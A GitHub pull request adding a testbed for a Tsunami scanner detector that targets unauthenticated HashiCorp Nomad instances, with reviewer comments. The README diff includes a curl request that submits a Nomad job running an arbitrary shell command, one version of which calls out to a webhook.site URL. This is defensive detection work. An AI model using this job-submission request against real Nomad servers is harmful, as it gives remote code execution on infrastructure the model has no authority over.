Skip to content

Unauthenticated nomad instance#158

Open
am0o0 wants to merge 6 commits intogoogle:mainfrom
am0o0:hashicorp-nomad
Open

Unauthenticated nomad instance#158
am0o0 wants to merge 6 commits intogoogle:mainfrom
am0o0:hashicorp-nomad

Conversation

@am0o0
Copy link
Contributor

@am0o0 am0o0 commented Aug 13, 2025

@leonardo-doyensec
Copy link
Contributor

Hello @am0o0.
Thank you for contribution. Can you please implement the testbed using Docker?

Feel free to reach out
~ Leonardo (Doyensec)

@am0o0
Copy link
Contributor Author

am0o0 commented Aug 21, 2025

@leonardo-doyensec Hello 👋
Im not sure about Docker since the Nomad need to have docker installed on the system, I'm not sure how it is possible.

@leonardo-doyensec
Copy link
Contributor

What about https://hub.docker.com/r/hashicorp/nomad?

@am0o0
Copy link
Contributor Author

am0o0 commented Aug 21, 2025

Ok sorry, let me check further.

@am0o0
Copy link
Contributor Author

am0o0 commented Aug 21, 2025

@leonardo-doyensec, I had to use --privileged -v /sys/fs/cgroup:/sys/fs/cgroup:rw switches to run the Nomad. If you have any other solutions, I'd like to learn :)

@giacomo-doyensec
Copy link
Contributor

Hi @am0o0, I got it working without --privileged just like this

docker run --rm -it \
  -v /sys/fs/cgroup:/sys/fs/cgroup:rw \
  -p 4646:4646 \
  hashicorp/nomad:1.10 \
  agent -dev -bind 0.0.0.0 -network-interface='{{ GetDefaultInterfaces | attr "name" }}'

Could you also provide a safe version of the testbed?
Thanks and feel free to reach out!

@am0o0
Copy link
Contributor Author

am0o0 commented Feb 13, 2026

@giacomo-doyensec I appreciate your thorough solution.

@robert-doyensec, I think this PR is ready for review now.

@tooryx tooryx added the tsunami label Feb 18, 2026
@robert-doyensec
Copy link

Hi @am0o0 , sorry for the confusion. I ran into issues confirming the vulnerability with the provided testbed -- it does seem necessary to use --privileged and an exposed docker mount -v /var/run/docker.sock:/var/run/docker.sock when using the docker driver. Additionally, it doesn't seem to work when running on apple silicon due to failure to get the CPU usage. Can you update the README to reflect these, and add a small warning that the container is privileged?

```bash
# replace the COMMAND_HERE with your command like `curl url`
curl 'http://localhost:4646/v1/jobs' -X POST -H 'content-type: application/json; charset=utf-8' --data-raw '{"Job":{"Affinities":null,"AllAtOnce":false,"Constraints":null,"ConsulNamespace":"","CreateIndex":0,"Datacenters":["dc1"],"DispatchIdempotencyToken":null,"Dispatched":false,"ID":"tsunami-job","JobModifyIndex":0,"Meta":null,"Migrate":null,"ModifyIndex":0,"Multiregion":null,"Name":"tsunami-job","Namespace":"default","NodePool":"","NomadTokenID":"","ParameterizedJob":null,"ParentID":"","Payload":null,"Periodic":null,"Priority":50,"Region":"global","Reschedule":null,"Spreads":null,"Stable":false,"Status":"","StatusDescription":"","Stop":false,"SubmitTime":null,"TaskGroups":[{"Affinities":null,"Constraints":null,"Consul":null,"Count":1,"Disconnect":null,"EphemeralDisk":{"Migrate":false,"SizeMB":300,"Sticky":false},"MaxClientDisconnect":null,"Meta":null,"Migrate":null,"Name":"curl","Networks":null,"PreventRescheduleOnLost":null,"ReschedulePolicy":{"Attempts":1,"Delay":5000000000,"DelayFunction":"constant","Interval":86400000000000,"MaxDelay":0,"Unlimited":false},"RestartPolicy":{"Attempts":3,"Delay":15000000000,"Interval":86400000000000,"Mode":"fail","RenderTemplates":false},"Scaling":null,"Services":null,"ShutdownDelay":null,"Spreads":null,"StopAfterClientDisconnect":null,"Tasks":[{"Actions":null,"Affinities":null,"Artifacts":null,"Config":{"args":["-lc","COMMAND_HERE"],"image":"curlimages/curl:8.8.0","command":"sh"},"Constraints":null,"Consul":null,"DispatchPayload":null,"Driver":"docker","Env":null,"Identities":null,"Identity":null,"KillSignal":"","KillTimeout":5000000000,"Kind":"","Leader":false,"Lifecycle":null,"LogConfig":{"Disabled":false,"Enabled":null,"MaxFileSizeMB":10,"MaxFiles":10},"Meta":null,"Name":"run-curl","Resources":{"CPU":100,"Cores":0,"Devices":null,"DiskMB":null,"IOPS":null,"MemoryMB":64,"MemoryMaxMB":null,"NUMA":null,"Networks":null,"SecretsMB":null},"RestartPolicy":{"Attempts":3,"Delay":15000000000,"Interval":86400000000000,"Mode":"fail","RenderTemplates":false},"ScalingPolicies":null,"Schedule":null,"Services":null,"ShutdownDelay":0,"Templates":null,"User":"","Vault":null,"VolumeMounts":null}],"Update":null,"Volumes":null}],"Type":"batch","UI":null,"Update":null,"VaultNamespace":"","Version":0,"VersionTag":null,"meta":{}},"Submission":{"Source":"job \"tsunami-job\" {\n datacenters = [\"dc1\"]\n type = \"batch\"\n\n group \"curl\" {\n count = 1\n\n task \"run-curl\" {\n driver = \"docker\"\n\n config {\n image = \"curlimages/curl:8.8.0\"\n command = \"sh\"\n args = [\n \"-lc\",\n \"\"\n ]\n }\n\n resources {\n cpu = 100\n memory = 64\n }\n }\n }\n}","Format":"hcl2"}}'
curl 'http://localhost:4646/v1/jobs' -X POST -H 'content-type: application/json; charset=utf-8' --data-raw '{"Job":{"Affinities":null,"AllAtOnce":false,"Constraints":null,"ConsulNamespace":"","CreateIndex":0,"Datacenters":["dc1"],"DispatchIdempotencyToken":null,"Dispatched":false,"ID":"tsunami-job","JobModifyIndex":0,"Meta":null,"Migrate":null,"ModifyIndex":0,"Multiregion":null,"Name":"tsunami-job","Namespace":"default","NodePool":"","NomadTokenID":"","ParameterizedJob":null,"ParentID":"","Payload":null,"Periodic":null,"Priority":50,"Region":"global","Reschedule":null,"Spreads":null,"Stable":false,"Status":"","StatusDescription":"","Stop":false,"SubmitTime":null,"TaskGroups":[{"Affinities":null,"Constraints":null,"Consul":null,"Count":1,"Disconnect":null,"EphemeralDisk":{"Migrate":false,"SizeMB":300,"Sticky":false},"MaxClientDisconnect":null,"Meta":null,"Migrate":null,"Name":"curl","Networks":null,"PreventRescheduleOnLost":null,"ReschedulePolicy":{"Attempts":1,"Delay":5000000000,"DelayFunction":"constant","Interval":86400000000000,"MaxDelay":0,"Unlimited":false},"RestartPolicy":{"Attempts":3,"Delay":15000000000,"Interval":86400000000000,"Mode":"fail","RenderTemplates":false},"Scaling":null,"Services":null,"ShutdownDelay":null,"Spreads":null,"StopAfterClientDisconnect":null,"Tasks":[{"Actions":null,"Affinities":null,"Artifacts":null,"Config":{"args":["-lc","curl https://webhook.site/4005ef73-683e-4d8d-be9e-54253eb2f2b2"],"image":"curlimages/curl:8.8.0","command":"sh"},"Constraints":null,"Consul":null,"DispatchPayload":null,"Driver":"docker","Env":null,"Identities":null,"Identity":null,"KillSignal":"","KillTimeout":5000000000,"Kind":"","Leader":false,"Lifecycle":null,"LogConfig":{"Disabled":false,"Enabled":null,"MaxFileSizeMB":10,"MaxFiles":10},"Meta":null,"Name":"run-curl","Resources":{"CPU":100,"Cores":0,"Devices":null,"DiskMB":null,"IOPS":null,"MemoryMB":64,"MemoryMaxMB":null,"NUMA":null,"Networks":null,"SecretsMB":null},"RestartPolicy":{"Attempts":3,"Delay":15000000000,"Interval":86400000000000,"Mode":"fail","RenderTemplates":false},"ScalingPolicies":null,"Schedule":null,"Services":null,"ShutdownDelay":0,"Templates":null,"User":"","Vault":null,"VolumeMounts":null}],"Update":null,"Volumes":null}],"Type":"batch","UI":null,"Update":null,"VaultNamespace":"","Version":0,"VersionTag":null,"meta":{}},"Submission":{"Source":"job \"tsunami-job\" {\n datacenters = [\"dc1\"]\n type = \"batch\"\n\n group \"curl\" {\n count = 1\n\n task \"run-curl\" {\n driver = \"docker\"\n\n config {\n image = \"curlimages/curl:8.8.0\"\n command = \"sh\"\n args = [\n \"-lc\",\n \"\"\n ]\n }\n\n resources {\n cpu = 100\n memory = 64\n }\n }\n }\n}","Format":"hcl2"}}'
Copy link

@robert-doyensec robert-doyensec Feb 25, 2026

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Please use COMMAND_HERE as stated in the line above, I think you changed this by accident.

Suggested change
curl 'http://localhost:4646/v1/jobs' -X POST -H 'content-type: application/json; charset=utf-8' --data-raw '{"Job":{"Affinities":null,"AllAtOnce":false,"Constraints":null,"ConsulNamespace":"","CreateIndex":0,"Datacenters":["dc1"],"DispatchIdempotencyToken":null,"Dispatched":false,"ID":"tsunami-job","JobModifyIndex":0,"Meta":null,"Migrate":null,"ModifyIndex":0,"Multiregion":null,"Name":"tsunami-job","Namespace":"default","NodePool":"","NomadTokenID":"","ParameterizedJob":null,"ParentID":"","Payload":null,"Periodic":null,"Priority":50,"Region":"global","Reschedule":null,"Spreads":null,"Stable":false,"Status":"","StatusDescription":"","Stop":false,"SubmitTime":null,"TaskGroups":[{"Affinities":null,"Constraints":null,"Consul":null,"Count":1,"Disconnect":null,"EphemeralDisk":{"Migrate":false,"SizeMB":300,"Sticky":false},"MaxClientDisconnect":null,"Meta":null,"Migrate":null,"Name":"curl","Networks":null,"PreventRescheduleOnLost":null,"ReschedulePolicy":{"Attempts":1,"Delay":5000000000,"DelayFunction":"constant","Interval":86400000000000,"MaxDelay":0,"Unlimited":false},"RestartPolicy":{"Attempts":3,"Delay":15000000000,"Interval":86400000000000,"Mode":"fail","RenderTemplates":false},"Scaling":null,"Services":null,"ShutdownDelay":null,"Spreads":null,"StopAfterClientDisconnect":null,"Tasks":[{"Actions":null,"Affinities":null,"Artifacts":null,"Config":{"args":["-lc","curl https://webhook.site/4005ef73-683e-4d8d-be9e-54253eb2f2b2"],"image":"curlimages/curl:8.8.0","command":"sh"},"Constraints":null,"Consul":null,"DispatchPayload":null,"Driver":"docker","Env":null,"Identities":null,"Identity":null,"KillSignal":"","KillTimeout":5000000000,"Kind":"","Leader":false,"Lifecycle":null,"LogConfig":{"Disabled":false,"Enabled":null,"MaxFileSizeMB":10,"MaxFiles":10},"Meta":null,"Name":"run-curl","Resources":{"CPU":100,"Cores":0,"Devices":null,"DiskMB":null,"IOPS":null,"MemoryMB":64,"MemoryMaxMB":null,"NUMA":null,"Networks":null,"SecretsMB":null},"RestartPolicy":{"Attempts":3,"Delay":15000000000,"Interval":86400000000000,"Mode":"fail","RenderTemplates":false},"ScalingPolicies":null,"Schedule":null,"Services":null,"ShutdownDelay":0,"Templates":null,"User":"","Vault":null,"VolumeMounts":null}],"Update":null,"Volumes":null}],"Type":"batch","UI":null,"Update":null,"VaultNamespace":"","Version":0,"VersionTag":null,"meta":{}},"Submission":{"Source":"job \"tsunami-job\" {\n datacenters = [\"dc1\"]\n type = \"batch\"\n\n group \"curl\" {\n count = 1\n\n task \"run-curl\" {\n driver = \"docker\"\n\n config {\n image = \"curlimages/curl:8.8.0\"\n command = \"sh\"\n args = [\n \"-lc\",\n \"\"\n ]\n }\n\n resources {\n cpu = 100\n memory = 64\n }\n }\n }\n}","Format":"hcl2"}}'
curl 'http://localhost:4646/v1/jobs' -X POST -H 'content-type: application/json; charset=utf-8' --data-raw '{"Job":{"Affinities":null,"AllAtOnce":false,"Constraints":null,"ConsulNamespace":"","CreateIndex":0,"Datacenters":["dc1"],"DispatchIdempotencyToken":null,"Dispatched":false,"ID":"tsunami-job","JobModifyIndex":0,"Meta":null,"Migrate":null,"ModifyIndex":0,"Multiregion":null,"Name":"tsunami-job","Namespace":"default","NodePool":"","NomadTokenID":"","ParameterizedJob":null,"ParentID":"","Payload":null,"Periodic":null,"Priority":50,"Region":"global","Reschedule":null,"Spreads":null,"Stable":false,"Status":"","StatusDescription":"","Stop":false,"SubmitTime":null,"TaskGroups":[{"Affinities":null,"Constraints":null,"Consul":null,"Count":1,"Disconnect":null,"EphemeralDisk":{"Migrate":false,"SizeMB":300,"Sticky":false},"MaxClientDisconnect":null,"Meta":null,"Migrate":null,"Name":"curl","Networks":null,"PreventRescheduleOnLost":null,"ReschedulePolicy":{"Attempts":1,"Delay":5000000000,"DelayFunction":"constant","Interval":86400000000000,"MaxDelay":0,"Unlimited":false},"RestartPolicy":{"Attempts":3,"Delay":15000000000,"Interval":86400000000000,"Mode":"fail","RenderTemplates":false},"Scaling":null,"Services":null,"ShutdownDelay":null,"Spreads":null,"StopAfterClientDisconnect":null,"Tasks":[{"Actions":null,"Affinities":null,"Artifacts":null,"Config":{"args":["-lc","COMMAND_HERE"],"image":"curlimages/curl:8.8.0","command":"sh"},"Constraints":null,"Consul":null,"DispatchPayload":null,"Driver":"docker","Env":null,"Identities":null,"Identity":null,"KillSignal":"","KillTimeout":5000000000,"Kind":"","Leader":false,"Lifecycle":null,"LogConfig":{"Disabled":false,"Enabled":null,"MaxFileSizeMB":10,"MaxFiles":10},"Meta":null,"Name":"run-curl","Resources":{"CPU":100,"Cores":0,"Devices":null,"DiskMB":null,"IOPS":null,"MemoryMB":64,"MemoryMaxMB":null,"NUMA":null,"Networks":null,"SecretsMB":null},"RestartPolicy":{"Attempts":3,"Delay":15000000000,"Interval":86400000000000,"Mode":"fail","RenderTemplates":false},"ScalingPolicies":null,"Schedule":null,"Services":null,"ShutdownDelay":0,"Templates":null,"User":"","Vault":null,"VolumeMounts":null}],"Update":null,"Volumes":null}],"Type":"batch","UI":null,"Update":null,"VaultNamespace":"","Version":0,"VersionTag":null,"meta":{}},"Submission":{"Source":"job \"tsunami-job\" {\n datacenters = [\"dc1\"]\n type = \"batch\"\n\n group \"curl\" {\n count = 1\n\n task \"run-curl\" {\n driver = \"docker\"\n\n config {\n image = \"curlimages/curl:8.8.0\"\n command = \"sh\"\n args = [\n \"-lc\",\n \"\"\n ]\n }\n\n resources {\n cpu = 100\n memory = 64\n }\n }\n }\n}","Format":"hcl2"}}'

Copy link

@robert-doyensec robert-doyensec left a comment

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Minor changes for clarity

@@ -0,0 +1,55 @@
# setup an unauthenticated nomad ui (vulnerable)

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Suggested change
# setup an unauthenticated nomad ui (vulnerable)
# Set Up an Unauthenticated Nomad UI (Vulnerable)

@@ -0,0 +1,55 @@
# setup an unauthenticated nomad ui (vulnerable)
you can install nomad cli according to the official document: https://developer.hashicorp.com/nomad/install

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Suggested change
you can install nomad cli according to the official document: https://developer.hashicorp.com/nomad/install
You can install the Nomad CLI according to the official document: https://developer.hashicorp.com/nomad/install

@@ -0,0 +1,55 @@
# setup an unauthenticated nomad ui (vulnerable)
you can install nomad cli according to the official document: https://developer.hashicorp.com/nomad/install
OR base on ubuntu 24.04 with docker run the following command to run nomad:

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Suggested change
OR base on ubuntu 24.04 with docker run the following command to run nomad:
OR to run Nomad on Ubuntu 24.04 with Docker run the following command:

OR base on ubuntu 24.04 with docker run the following command to run nomad:
## Warnings
1. The containers will run with `--privileged`.
2. the container doesn't run on the Apple Silicon

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Suggested change
2. the container doesn't run on the Apple Silicon
2. The container doesn't run correctly on Apple Silicon due to failure to get CPU usage when creating the job

agent -dev -bind 0.0.0.0 -network-interface='{{ GetDefaultInterfaces | attr "name" }}'
```

# confirming the exposed ui

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Suggested change
# confirming the exposed ui
# Confirming the Exposed UI

curl 'http://localhost:4646/v1/job/tsunami-job?purge=true' -X DELETE -H 'content-type: application/json; charset=utf-8'
```

# setup an authenticated nomad ui (safe)

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Suggested change
# setup an authenticated nomad ui (safe)
# Set Up an Authenticated Nomad UI (Safe)

```
This will output a `Secret ID` (the management token). All subsequent API/UI requests require this token.

# confirming the safe setup

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Suggested change
# confirming the safe setup
# Confirming the Safe Setup

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment

Labels

Projects

None yet

Development

Successfully merging this pull request may close these issues.

5 participants